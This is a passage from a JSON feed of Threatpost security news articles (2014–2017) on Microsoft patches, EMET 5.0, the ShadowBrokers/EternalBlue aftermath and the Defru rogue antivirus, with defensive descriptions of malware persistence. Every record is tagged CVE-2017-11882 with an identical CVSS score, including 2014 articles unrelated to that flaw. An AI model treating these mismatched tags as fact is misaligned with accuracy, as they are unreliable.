Windows.\u201d\n\nMicrosoft said that customers with automatic updates enabled are protected and would not have to take additional action to receive these updates. Microsoft said this is a rare decision and encouraged admins to apply the critical updates.\n\n\u201cOur decision today to release these security updates for platforms not in extended support should not be viewed as a departure from our standard servicing policies,\u201d said Eric Doerr, general manager of the Microsoft Security Response Center. \u201cBased on an assessment of the current threat landscape by our security engineers, we made the decision to make updates available more broadly.\u201d\n\nSince WannaCry, security experts have been warning Windows admins about the ferocity of the EternalBlue exploit and that it could be loaded with [any sort of payload](<https://threatpost.com/next-nsa-exploit-payload-could-be-much-worse-than-wannacry/125743/>), including wiper malware, banking Trojans, or more ransomware. Attackers have already on two occasions used it to spread cryptocurrency mining utilities.\n\nIt\u2019s unknown whether Microsoft was given any advance warning of another upcoming leak or if there are rumblings of another WannaCry-style attack. The ShadowBrokers promised monthly leaks of anything from Windows 10 exploits to mobile attacks to stolen nuclear and missile data in a new subscription service it promised to start next month.\n\nMicrosoft also maintained that organizations should long ago have moved away from older, unsupported platforms such as XP. Windows 10, for example, contains many new mitigations that prevent exploits such as EternalBlue from successfully compromising computers. Opponents of today\u2019s move\u2014and of the May 12 emergency update\u2014contend that these concessions on Microsoft\u2019s part to provide these types of updates will allow organizations to rationalize staying on unsupported versions of Windows.\n", "cvss3": {}, "published": "2017-06-13T15:34:53", "type": "threatpost", "title": "Risk of 'Destructive Cyber Attacks' Prompts Microsoft to Update XP Again", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2017-06-13T19:35:24", "id": "THREATPOST:F9FEB3F0862AAD4CC618F9737F44FA7B", "href": "https://threatpost.com/risk-of-destructive-cyber-attacks-prompts-microsoft-to-update-xp-again/126235/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:07", "description": "Scott Charney, the head of Microsoft\u2019s Trustworthy Computing efforts, said that he was the one who decided it was time to [move the TwC group in a new direction](<https://threatpost.com/era-ends-with-break-up-of-trustworthy-computing-group-at-microsoft/108404>) and integrate the security functions more deeply into the company as a whole.\n\n\u201cI was the architect of these changes. This is not about the company\u2019s loss of focus or diminution of commitment. Rather, in my view, these changes are necessary if we are to advance the state of trust in computing,\u201d Charney, the corporate vice president of Trustworthy Computing at Microsoft, wrote in a blog post.\n\nThe Trustworthy Computing team was an outgrowth of the effort that Microsoft started in 2002 to build more secure software. Modest at first, the TwC group eventually grew into a large team of engineers, developers and executives and became one of the more influential groups in the company. Charney, a former Department of Justice lawyer who joined Microsoft just as the security push was getting off the ground in 2002, said that the move to disperse the TwC team into different groups and change the reporting structure would help the company react more quickly and be more efficient with security related decisions.\n\n\u201cBy consolidating work within the company, as well as altering some reporting structures, Microsoft will be able to make a number of trust-related decisions more quickly and execute plans with greater speed, whether the objective is to get innovations into the hands of our customers, improve our engineering systems, ensure compliance with legal or corporate policies, or engage with regulators around the world,\u201d Charney wrote in the [post](<http://blogs.microsoft.com/cybertrust/2014/09/22/looking-forward-trustworthy-computing/>).\n\nOne of the key functions of the TwC team over the years has been the development and implementation of the Security Development Lifecycle, the comprehensive development, engineering and deployment program that\u2019s meant to build security into the company\u2019s products from the beginning. Charney said that the SDL will remain the responsibility of the part of the TwC group that\u2019s moving to the Cloud and Enterprise Division.\n\n\u201cI will continue to lead the Trustworthy Computing team in our new home as part of the Cloud and Enterprise Division. Significantly, Trustworthy Computing will maintain our company-wide responsibility for centrally driven programs such as the Security Development Lifecycle (SDL) and Online Security Assurance (OSA). But this change will also allow us to embed ourselves more fully in the engineering division most responsible for the future of cloud and security, while increasing the impact of our critical work on privacy issues by integrating those functions directly into the appropriate engineering and legal policy organizations,\u201d Charney said.\n\nThe change to the TwC group became public last week as the company was in the process of laying off 2,100 employees as part of a series of internal changes.\n", "cvss3": {}, "published": "2014-09-23T08:53:50", "type": "threatpost", "title": "Charney on Trustworthy Computing: 'I Was the Architect of These Changes'", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-09-25T18:08:18", "id": "THREATPOST:04738138B50414CEACDB62EFA6D61789", "href": "https://threatpost.com/charney-on-trustworthy-computing-i-was-the-architect-of-these-changes/108455/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:11", "description": "The [Operation SnowMan espionage campaign](<http://threatpost.com/new-ie-10-zero-day-targeting-military-intelligence/104272>), which targeted military intelligence earlier this year via an Internet Explorer zero day, exposed a weak spot in Microsoft\u2019s vulnerability management efforts. What was unique about the SnowMan operation is that it included a check as to whether the compromised computer was running [Microsoft\u2019s Enhanced Mitigation Experience Toolkit (EMET)](<http://threatpost.com/microsoft-emet-bypasses-realm-of-white-hats-for-now/104619>), and if so, the attack would not execute.\n\nAs it turns out, attackers were taking advantage of an information disclosure bug that revealed whether EMET and other antimalware protections were active. Today, Microsoft took steps to close that gap in its latest cumulative update for IE.\n\nThe critical patch is one of four released today by Microsoft as part of its monthly [Patch Tuesday security bulletins](<https://technet.microsoft.com/library/security/ms14-sep>). The IE update patches 37 vulnerabilities, including the publicly known disclosure bug. The three remaining bulletins for .NET, Windows Task Scheduler, and Microsoft Lync, were rated important by Microsoft and likely don\u2019t result in remote code execution.\n\nEMET is a free toolkit provided by Microsoft that midmarket and enterprise IT shops can deploy as a temporary stopgap for a zero-day vulnerability being exploited in the wild. The toolkit provides a host of exploit mitigations that protect against common memory corruption vulnerabilities. The vulnerability patched in IE allows resources loaded into memory to be queried, Microsoft said, giving attacker a head\u2019s up as to what protections are running on a machine.\n\nThe IE patch, MS14-052, is the highest priority bulletin for IT shops this month, experts said.\n\nThe IE patch, [MS14-052](<https://technet.microsoft.com/library/security/MS14-052>), is the highest priority bulletin for IT shops this month, experts said.\n\n\u201cThis patch is Microsoft\u2019s attempt to limit the capability of exploit kits that have been identified as using an information disclosure technique to determine if particular security software were installed,\u201d said Craig Young, a security researcher with Tripwire. \u201cThe flaw allows a malicious website to determine if a software package is installed by querying the availability of a DLL used by that software. Information regarding active security products on a target is very useful for an attacker; it allows them to avoid raising alarms by sending detectable payloads.\u201d\n\nThe update also patches vulnerabilities in the browser going back to IE6 running on Windows Server through current versions.\n\nThe next bulletin worth watching, experts said, is [MS14-054](<https://technet.microsoft.com/library/security/MS14-054>), a privilege escalation vulnerability in Task Scheduler. In order to exploit the bug, an attacker would need to have valid credentials and local access to an affected system in order to run their exploit.\n\nThe vulnerability affects Windows 8, Windows 8.1, Windows RT and Windows RT 8.1, as well as Windows Server 2012 and Windows Server 2012 R2.\n\n\u201cMS14-054 should also be high on IT admins patch list as Microsoft expects to see reliable task scheduler exploits developed within a month,\u201d Young said. \u201cSuccessful exploitation of this vulnerability would allow any user to take complete control of the affected system.\u201d\n\nMicrosoft also patched a denial-of-service vulnerability in its .NET framework. [MS14-053](<https://technet.microsoft.com/library/security/MS14-053>) affects most versions of .NET, and also affects ASP.NET installations if it\u2019s enabled on IIS.\n\n\u201cIf left unpatched, remote un-authenticated attackers can send HTTP/HTTPs request to cause resource exhaustion which will ultimately lead to deal-of-service condition on the ASP.NET web server,\u201d said Amol Sarwate, director of vulnerability labs at Qualys.\n\nThe final bulletin, [MS14-055](<https://technet.microsoft.com/library/security/MS14-055>), patches three denial-of-service vulnerabilities in Microsoft\u2019s messaging server, Lync.\n\n\u201cThe security update addresses the vulnerabilities by correcting the way Lync Server sanitizes user input and by correcting the way Lync Server handles exceptions and null dereferences,\u201d Microsoft said in its advisory.\n\nMicrosoft also updated three security advisories today:\n\n * [Advisory 2871997](<https://technet.microsoft.com/library/security/2871997.aspx>) updates credential protection and domain authentication controls for Windows 7 and Windows Server 2008 R2. The update ensures credentials are cleaned up immediately rather than when a new Kerberos TGT ticket has been obtained.\n * [Advisory 2905247](<https://technet.microsoft.com/library/security/2905247.aspx>) is an update for Microsoft ASP.NET that patches a privilege elevation vulnerability in an ASP.NET view state that that was made available last December. As of today\u2019s update, the security update is available via Microsoft Update in addition to the Download-Center-only option provided in December.\n * [Advisory 2755801](<https://technet.microsoft.com/en-us/library/security/2755801.aspx>) is an update for Adobe Flash Player in Internet Explorer versions running on Windows 8 and Windows 8.1. Today\u2019s update is for IE 10 on Windows 8, Windows Server 2012 and Windows RT, and IE 11 on Windows 8.1, Windows Server 2012 R2 and Windows RT 8.1.\n", "cvss3": {}, "published": "2014-09-09T14:40:33", "type": "threatpost", "title": "September 2014 Microsoft Patch Tuesday security bulletins", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-09-09T18:40:33", "id": "THREATPOST:D4C8CD7D146990740B8339D88A3FDB84", "href": "https://threatpost.com/emet-av-disclosure-leak-plugged-in-ie/108175/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:13", "description": "Microsoft today announced a relatively light load of patches will be delivered on [Patch Tuesday](<https://technet.microsoft.com/library/security/ms14-sep>) next week, along with some numbers that demonstrate public vulnerability disclosures continue to rise.\n\nFour security bulletins, one rated critical, are scheduled to be released next Tuesday. In what\u2019s becoming customary for Patch Tuesday, administrators can expect another cumulative patch roll-up for Internet Explorer addressing a number of remote code execution vulnerabilities in the browser.\n\nThe three remaining bulletins, all rated important by Microsoft, include a privilege-escalation bug in Windows 8 and 8.1 as well as Windows Server 2012 and RT. Another bulletin patches a .NET denial-of-service vulnerability in Windows Server 2003, 2008 and 2012, and on the client side OS back to Vista.\n\nAnother denial-of-service bug is expected to be patched in Microsoft\u2019s Lync instant messaging and collaboration software.\n\n\u201cThe few number of patches expected out next week doesn\u2019t mean you can take a pass on patching this month.\u201d\n\n\u201cThe few number of patches expected out next week doesn\u2019t mean you can take a pass on patching this month however,\u201d cautions Russ Ernst, director, product management, Lumension.\n\nLast month, Microsoft patched IE with a [cumulative update that addressed 26 vulnerabilities](<http://threatpost.com/microsoft-keeps-focus-on-ie-security-with-patch-tuesday-updates/107729>) including one exploited in the wild. The news out of last month\u2019s batch of bulletins, however, was a faulty patch, MS14-045, that was [re-released after users complained of crashes and blue screens of death](<http://threatpost.com/microsoft-fixes-broken-security-patch-ms14-045/107953>). The bulletin addressed vulnerabilities in kernel-mode drivers, and Microsoft blamed font issues for the system crashes.\n\nIn the meantime, Microsoft points out in a separate announcement that public vulnerability disclosures are approaching levels matching the first half of 2012, and that more than 4,000 disclosures have been made annually since the start of 2011. That number is still well shy of the 7,000 disclosed in the 2006-2007 timeframe, Microsoft said.\n\nFor the last half of 2013, for example, disclosures across the industry were up 6.5 percent from the start of the year, and up 12.6 percent from the second half of 2012. The severity of disclosures, however, is down. A little more than six percent of bugs scored 9.9 or greater on the CVSS standard in the second half of 2013, down from almost 13 percent in the first six months of the year.\n\n\u201cVulnerability complexity is an important factor to consider in determining the magnitude of the threat that a vulnerability poses,\u201d wrote Microsoft\u2019s Tim Rains in the [report](<http://blogs.technet.com/b/security/archive/2014/09/03/industry-vulnerability-disclosures-trending-up.aspx>). \u201cA high-severity vulnerability that can only be exploited under very specific and rare circumstances might require less immediate attention than a lower-severity vulnerability that can be exploited more easily.\u201d\n\nDisclosures of medium- and low-complexity bugs, posing the highest risk to users, far outnumber disclosures of high complexity vulnerabilities, Microsoft said.\n\nThird-party applications such as media players or Web components such as Flash or Java continue to thrive, with disclosures up 34.4 percent in the latter half of 2013 and accounted for 58 percent of disclosures during that timeframe. Operating system vulnerability disclosures, meanwhile, were down 46 percent and accounted for 15 percent of total disclosures. Browser bugs, meanwhile, were also down 28 percent and made up 10 percent of overall disclosures.\n\nMicrosoft also examined disclosures for its products, 174 in the second half of 2013, up 2 percent from the first six months. Microsoft disclosures account for 7 percent of industry disclosures, down slightly from the start of the year.\n", "cvss3": {}, "published": "2014-09-04T15:07:28", "type": "threatpost", "title": "September 2014 Microsoft Patch Tuesday advance notification", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-09-04T19:07:28", "id": "THREATPOST:29E9543F6EC7903A34D286C6F4391368", "href": "https://threatpost.com/patch-tuesday-includes-another-ie-update-vuln-disclosures-up/108098/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:15", "description": "Microsoft today re-released [security bulletin MS14-045](<http://threatpost.com/microsoft-yet-to-deliver-fix-for-faulty-patch-tuesday-update/107809>), which was pulled shortly after the [August Patch Tuesday updates](<http://threatpost.com/microsoft-keeps-focus-on-ie-security-with-patch-tuesday-updates/107729>) because a number of users reported crashes and blue screens. The patch was removed from Windows Update on Aug. 15, three days after it was released as part of Microsoft\u2019s monthly patch cycle.\n\n\u201cAs soon as we became aware of some problems, we began a review and then immediately pulled the problematic updates, making these unavailable to download,\u201d said Tracey Pretorius, director, Trustworthy Computing at Microsoft. \u201cWe then began working on a plan to rerelease the affected updates.\u201d\n\n[MS14-045](<https://technet.microsoft.com/en-us/library/security/ms14-045.aspx>) patched vulnerabilities in kernel-mode drivers that were rated important by Microsoft because they require valid credentials and local access in order to exploit. Successful exploits could have led to an elevation of privileges on a compromised Windows machine.\n\nMicrosoft said at the time that a font issue patched in the update was the culprit causing the reported system crashes. Microsoft said that only a small number of computers were affected. There were other issues with the bulletin, the most serious causing systems to crash and render a 0x50 Stop error message after installation. Users were also seeing \u201cFile in Use\u201d error messages because of the font issue in question.\n\nThe bugs affect Windows systems all the way back to Windows Server 2003 and all supported desktop versions of Windows. Windows Update users will automatically get the patch, otherwise, Microsoft urges users to install the update.\n\nThis month\u2019s update had a distinct IE feel to them with another cumulative update patching 26 vulnerabilities in Microsoft\u2019s flagship browser, including a publicly reported vulnerability that is likely being exploited in the wild. All 26 vulnerabilities were rated critical and could be remotely exploited.\n\nThe update came on the heels of an announcement at the start of the month alerting users that Microsoft would, in 18 months, no longer support older version of the browser. With a rash of zero-days and high profile exploits targeting older versions of IE, such as 6, 7 and 8, Microsoft made it clear that users should use only a current browser with modern memory exploit mitigations built in.\n\nMicrosoft also announced it would be [blocking older ActiveX controls in Internet Explorer](<http://threatpost.com/ie-to-block-older-activex-controls-starting-with-java/107672>), starting with out of date versions of Java, another platform heavily targeted by hackers.\n\nThe next scheduled Patch Tuesday security bulletins release is set for Sept. 9.\n", "cvss3": {}, "published": "2014-08-27T14:08:58", "type": "threatpost", "title": "Microsoft Re-Releases Broken Security Patch MS14-045", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-09-04T12:04:44", "id": "THREATPOST:2DAD0426512A1257D3D75569F282640E", "href": "https://threatpost.com/microsoft-fixes-broken-security-patch-ms14-045/107953/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:17", "description": "Rogue antivirus was once the scourge of the Internet, and [while this sort of malware is not entirely extinct](<http://threatpost.com/pro-syrian-malware-increasing-in-number-complexity/107814>), it\u2019s fallen out of favor among criminals as users have become more aware and security products have gotten better at blocking the threat.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2014/08/07015231/Rogue-AV-decline.png>)\n\n_Image via TechNet_\n\nHowever, Daniel Chipiristeanu, an antivirus researcher at the Microsoft Malware Protection Center (MMPC), claims that a simpler, and primarily browser-based, version of the fake antivirus scheme has proven more effective in recent months.\n\nThe MMPC says that once a user machine is compromised by once such piece of malware, Rogue:Win32/Defru, it blocks users from browsing to a long list of popular websites on the Internet and instead presents an image familiar to anyone who\u2019s dealt with rogue antivirus in the past.\n\n\u201cWhen the user is browsing the Internet, the rogue will use the hosts file to redirect links to a rather infamous specific fake website (pcdefender.&lt;removed&gt; IP 82.146.&lt;removed&gt;.21) that is often used in social engineering by fake antivirus malware,\u201d Chipiristeanu explained on Microsoft\u2019s TechNet blog.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2014/08/07015227/win32delfru.png>)\n\n_Image via TechNet_\n\nWhile the user will see the above image in their browser window, the URL in the address bar will be that of the website the user intended to visit in the first place. In other words, the malware quietly redirects the user to a new website, but the address bar does not reflect that movement. If the user tries to access another website, the threat follows. The message reads:\n\n\u201c_Detected on your computer malicious software that blocks access to certain Internet resources, in order to protect your authentication data from intruders the defender system Windows Security was forced to intervene.\u201d_\n\nThe fake scanner shows users a long list of non-existent malware it claims to have found on the computer in question. Then it offers to clean the system for a fee. If the user clicks the \u201cPay Now\u201d button, he will be redirected to a payment portal called \u201cpayeer.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2014/08/07015224/defru-payment.png>)\n\n_Image via TechNet_\n\nChipiristeanu claims that paying the fee will not fix the problem.\n\nAt the moment, most of Defru\u2019s victim-machines \u2013 as is indicated by language \u2013 appear to be located in Russia. The United States is a distant second to Russia with Kazakhstan following closely behind in third. The remaining infections are mostly in eastern European and Middle Eastern states with some infections in western Europe as well.\n\nYou can find the list of redirected sites with the [detailed Defru malware information](<http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Rogue:Win32/Defru#tab=2>).\n\n\u201cThe rogue is written in PHP, uses a PHP EXE compiler (Bambalam) and will copy itself to %appdata%\\w1ndows_&lt;4chars&gt;.exe (e.g. \u2018w1ndows_33a0.exe\u2019),\u201d Chipiristeanu explains. \u201cIt persists at system reboot by adding itself to the registry key HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run with the value \u2018w1ndows_&lt;4chars&gt;\u2019.\u201d\n\n\u201cThe user can clean their system by removing the entry value from the \u201crun\u201d registry key, delete the file from disk and delete the added entries from the hosts file.\u201d\n", "cvss3": {}, "published": "2014-08-20T13:59:20", "type": "threatpost", "title": "Fake AV Defru Puts New Spin on Rogue AV", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-08-25T18:42:59", "id": "THREATPOST:4FA617D4BE1CFDFB912E254229B94E61", "href": "https://threatpost.com/a-new-spin-on-rogue-antivirus/107846/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:20", "description": "Microsoft today released its monthly [Patch Tuesday Security Bulletins](<https://technet.microsoft.com/library/security/ms14-aug>), and the top priority is another cumulative update for Internet Explorer; this one patches 26 vulnerabilities, including one that\u2019s been publicly reported, Microsoft said, and is likely being exploited. All of them are rated critical by Microsoft and allow for remote code execution should a user land on a malicious webpage using IE.\n\n\u201cIf you feel like you are constantly patching IE \u2013 you are,\u201d said Russ Ernst of Lumension. \u201cA cumulative update for the browser is now the rule more so than the exception.\u201d\n\nErnst\u2019s sentiments are no doubt being echoed in enterprise IT shops worldwide. Admins have to contend with a number of upcoming changes related to IE as well. Microsoft last week put the word out that users had [18 months to migrate to the latest version of Internet Explorer](<http://blogs.msdn.com/b/ie/archive/2014/08/07/stay-up-to-date-with-internet-explorer.aspx>) for their respective versions of Windows before support would end. That would mean no more security updates for IE 6-8, older versions of the browser that lack built-in memory protections, making it so attractive for hackers and exploits.\n\nThe company followed that up last week with news that it would begin [blocking older ActiveX controls in IE](<http://threatpost.com/microsoft-expected-to-patch-ie-8-zero-day-on-patch-tuesday/106491>), starting with outdated versions of Java. That begins today, Microsoft said.\n\nThe point is that Microsoft is tired of IE being a punching bag, and it\u2019s going to force users\u2019 hands to upgrade to more secure versions of the browser and lessen the impact of targeted attacks and potential problems with [zero-days](<http://threatpost.com/microsoft-expected-to-patch-ie-8-zero-day-on-patch-tuesday/106491>) such as the one reported by HP\u2019s Zero Day Initiative in May.\n\n\u201cOutdated browsers represent a major challenge in keeping the Web ecosystem safer and more secure, as modern Web browsers have better security protection. Internet Explorer 11 includes features like Enhanced Protected Mode to help keep customers safer,\u201d said Roger Capriotti, director Internet Explorer, in a [blog post](<http://blogs.msdn.com/b/ie/archive/2014/08/07/stay-up-to-date-with-internet-explorer.aspx>) last week.\n\nToday\u2019s IE update, [MS14-051](<https://technet.microsoft.com/library/security/MS14-051>), include a slew of memory corruption bugs, most of them use-after-free vulnerabilities that are quickly catching up to buffer overflows as a favorite exploit for attackers.\n\n\u201cRecent advances in the state of the art for DOM fuzzing have made it easier to find [use-after-free] bugs in web browsers as researchers have found it harder and harder to find and exploit more traditional buffer overflows,\u201d said Craig Young, security researcher at Tripwire.\n\nYoung said hackers can combine a use-after-free vulnerability with a number of other techniques to bypass memory protections built in to the browser.\n\n\u201cJavaScript engines running in all browsers make it much easier for attackers to control memory allocators and therefore gain reliable code execution,\u201d Young said. \u201cCombining this vulnerability with JavaScript based \u2018heap-spraying\u2019 attacks and DEP-bypass techniques provides attackers with an easy way to execute arbitrary code.\u201d\n\nMicrosoft also advises that users pay attention to out-of-band updates released today by Adobe that patch vulnerabilities in Flash Player, as well as [a zero-day being exploited in targeted attacks against Adobe Reader and Acrobat](<http://threatpost.com/adobe-patches-reader-zero-day-used-in-targeted-attacks/107721>).\n\nThe remaining critical bulletin released today by Microsoft addresses a remote code execution vulnerability in Windows Media Center. [MS14-043](<https://technet.microsoft.com/library/security/ms14-043>) would require a user open a malicious Microsoft Office file that invokes a resource in the Media Center. This bulletin affects only Windows 7, 8 and 8.1 versions of Windows Media Center, as well as users of Windows Media Center TV Pack for Vista.\n\nThe final remote code execution vulnerability patched today, [MS14-048](<https://technet.microsoft.com/library/security/MS14-048>), is in Microsoft OneNote 2007 digital note-taking software. It\u2019s rated important because it requires user interaction to trigger an exploit.\n\nThe remaining bulletins are all rated important by Microsoft and include four privilege elevation vulnerabilities, and a pair of security feature bypass bugs.\n\n * [MS14-044](<https://technet.microsoft.com/library/security/MS14-044>) patches two vulnerabilities in Microsoft SQL Server Master Data Services and SQL Server relational database management system. Users would have to be lured to a website that injects client-side script into IE that would exploit the bug.\n * [MS14-045](<https://technet.microsoft.com/library/security/MS14-045>) fixes three vulnerabilities in Windows kernel-mode drivers where an attacker who is logged in to a computer and runs malicious code could elevate privileges.\n * [MS14-049](<https://technet.microsoft.com/library/security/MS14-049>) patches a vulnerability in Windows Installer Service that could be exploited if an attacker has valid credentials and runs a malicious application that tries to repair a previously installed app.\n * [MS14-050](<https://technet.microsoft.com/library/security/MS14-050>) is the final privilege escalation bug, and it\u2019s found in SharePoint Server. An authenticated attacker would need a malicious app running JavaScript in the user\u2019s context on a vulnerable SharePopint site to exploit the issue.\n * [MS14-046](<https://technet.microsoft.com/library/security/MS14-046>) and [MS14-047](<https://technet.microsoft.com/library/security/MS14-047>) are security feature bypass vulnerabilities in .NET Framework and LRPC. Both bugs require certain circumstances be in place, but could lead to a bypass of Address Space Layout Randomization (ASLR) and remote code execution.\n", "cvss3": {}, "published": "2014-08-12T15:09:09", "type": "threatpost", "title": "August 2014 Microsoft Patch Tuesday Security Bulletins", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-08-12T19:09:09", "id": "THREATPOST:5D9785F30280BD09EB7E645CA2EECE79", "href": "https://threatpost.com/microsoft-keeps-focus-on-ie-security-with-patch-tuesday-updates/107729/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:24", "description": "The latest version of Microsoft\u2019s freely available stopgap against zero-day exploits was released today with two new exploit mitigations and a batch of new configuration options.\n\nThe update to Microsoft\u2019s Enhanced Mitigation Experience Tool kit, or EMET, comes six months after a [technical preview of EMET 5.0](<http://threatpost.com/emet-5-0-technical-preview-offers-secure-plug-in-control/104490>) was released in February during the RSA Conference. It was then when Microsoft was touting new plug-in controls and memory protections, both of which have been rolled into [EMET 5.0](<http://blogs.technet.com/b/msrc/archive/2014/07/30/general-availability-for-enhanced-mitigation-experience-toolkit-emet-5-0.aspx>).\n\nThe first new mitigation is called Attack Surface Reduction (ASR). The mitigation allows Windows administrators to determine when\u2014or if\u2014plug-ins such as Java or Adobe Flash run at all on a Windows computer. Java and Flash, for example, have been favorite targets of hackers. Many advanced attacks exploit vulnerabilities in either platform, giving them an initial foothold on a system that can be then leveraged for further system and network access.\n\nWith ASR, administrators are able to, for example, allow Java plug-ins on internal websites, while blocking them to the open Internet.\n\nWith ASR, administrators are able to, for example, allow Java plug-ins on internal websites, while blocking them to the open Internet. They can also block Office applications, for example, from loading Flash in a Word or Excel document, but allow it in the browser.\n\n\u201cWe heard from customers that they wanted more control over which programs and in which scenarios these plugins can be loaded. We initially released a Fix It tool last year to disable the Java plugin entirely in Internet Explorer and that helped people,\u201d said Jonathan Ness, principal security development manager for the Microsoft Security Response Center. \u201cBut customers told us that they still needed Java for their line-of-business applications running on their local intranet and were looking for a way to block Java and other plugins from loading on the wider untrusted Internet.\u201d\n\nMicrosoft has been vocal about recommending EMET as a temporary mitigation for zero-day attacks against previously unreported vulnerabilities. EMET includes a dozen mitigations that block exploit attempts targeting memory vulnerabilities. Most of the mitigations are for return-oriented programming (ROP) exploits, in addition to memory-based mitigations ASLR, DEP, heap spray and SEHOP protections. EMET is not meant as a permanent fix, but only as a stopgap until a patch is ready for rollout.\n\nThe other new mitigation in EMET 5.0 is called Export Address Table Filtering Plus (EAF+), which introduces two new methods aimed at disrupting advanced attacks, Microsoft said.\n\n\u201cFor example, EAF+ adds a new \u2018page guard\u2019 protection to help prevent memory read operations, commonly used as information leaks to build exploitations,\u201d Microsoft said in a statement.\n\n\u201cIt\u2019s the way EMET blocks common exploit techniques, common shell code techniques. The engineers building EMET are the same engineers in the security response center that respond to attacks in the wild against our software and these guys are always studying new attack techniques that show up in real-world exploits,\u201d Ness said. \u201cEAF+ amplifies the scope and robustness of EAF. It blocks new kinds of exploit techniques by performing additional integrity checks and preventing certain memory read operations used as \u2018read anywhere\u2019 primitives in recent exploits.\u201d\n\nMicrosoft has also tweaked the configuration options in EMET 5.0 allowing admins to further configure how mitigations protect applications in a particular IT environment.\n\n\u201cUsers can configure which specific memory addresses to protect with the HeapSpray Allocation mitigation using EMET 5.0,\u201d Microsoft said. \u201cWe continue to provide smart defaults for many of the most common applications used by our customers.\u201d\n\nMicrosoft said it has also simplified the way EMET configuration changes can be pushed via Group Policy in Active Directory.\n\n\u201cThey will no longer need to refresh the EMET configuration on each host or wait for an application refresh to make configuration changes to all hosts via group policy,\u201d Ness said. \u201cConfiguration changes will take effect right away with the addition of the EMET Service.\u201d\n\nMicrosoft has also added new services that help users monitor logs for suspicious activity, and has added improvements to its Certificate Trust feature where users are able to establish settings that block users from visiting websites with untrusted digital certificates.\n\n\u201cAll EMET users are going to benefit from the way we refactored many components of the EMET 5.0 engine to maximize application compatibility and reduce false positives, and from the work we did with popular anti-malware products to ensure application compatibility,\u201d Ness said.\n", "cvss3": {}, "published": "2014-07-31T14:41:35", "type": "threatpost", "title": "Microsoft Releases EMET 5.0 Exploit Mitigation Tool", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-08-06T21:06:00", "id": "THREATPOST:985009AC9680D632153D78707A8949EF", "href": "https://threatpost.com/microsoft-releases-new-version-of-emet-exploit-mitigation-tool/107549/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:33", "description": "Tomorrow\u2019s regularly scheduled [patch update](<https://technet.microsoft.com/library/security/ms14-jul>) from Microsoft includes \u2013 go figure \u2013 another cumulative rollup for Internet Explorer and a critical fix for a Windows remote code execution bug. More of the same for sure, but there\u2019s another bug being patched that may merit moving up a rung on your list of priorities.\n\nRated Moderate impact by Microsoft, a patch is expected for the [Microsoft Server Bus for Windows Server](<http://msdn.microsoft.com/en-us/library/dn282144.aspx>), a set of components that support messaging capabilities for Windows Azure, Microsoft\u2019s cloud-based application platform. Developers use these components when building, testing and running message-driven applications, Microsoft says.\n\nThe update will take care of a denial-of-service vulnerability in the service; the moderate rating is a step below Important, likely because local authentication is required to exploit the issue.\n\n\u201cMicrosoft Service Bus is a messaging service used by many third-party web applications as well as by Microsoft Azure, so even though this is rated as Moderate, it is probable that this vulnerability would be used in conjunction with other vulnerabilities to target those applications,\u201d said Russ Ernst of Lumension.\n\nThe Service Bus patch is one of six bulletins scheduled for tomorrow, two of which are rated critical and three rated important.\n\nThe IE rollup addresses remote-code execution vulnerabilities in the browser.\n\nThe IE rollup addresses remote-code execution vulnerabilities in the browser, Microsoft said. IE has been patched every month this year since February, including in June when a[ six-month-old zero-day vulnerability was addressed in IE 8](<http://threatpost.com/microsoft-expected-to-patch-ie-8-zero-day-on-patch-tuesday/106491>).\n\n\u201cThe most critical patch to consider is Bulletin 1 is for all versions of Internet Explorer (IE), all the way from Internet Explorer 6, but only supported on Windows Server 2003 since XP has been retired, to the newest IE 11 on Windows 8.1 and R,\u201d said Qualys CTO Wolfgang Kandek. \u201cThis patch should be top of your list, since most attacks involve your web browser in some way.\u201d\n\nThe second critical vulnerability is another remote-code execution vulnerability that affects Windows on the client side back to Vista, WIndows 7, 8 and RT and on the server side, all the way to Windows Server 2003.\n\nThe three remaining vulnerabilities are privilege escalation bugs in Windows that are rated Important, and cannot be exploited remotely.\n\n\u201cExploits for these types of vulnerabilities are part of the toolkit of any attacker as they are extremely useful, when the attacker gets an account on the machine, say through stolen credentials,\u201d Kandek said. \u201cIn any practical scenario, the attacker then wants to assure continued control of the machine and will need 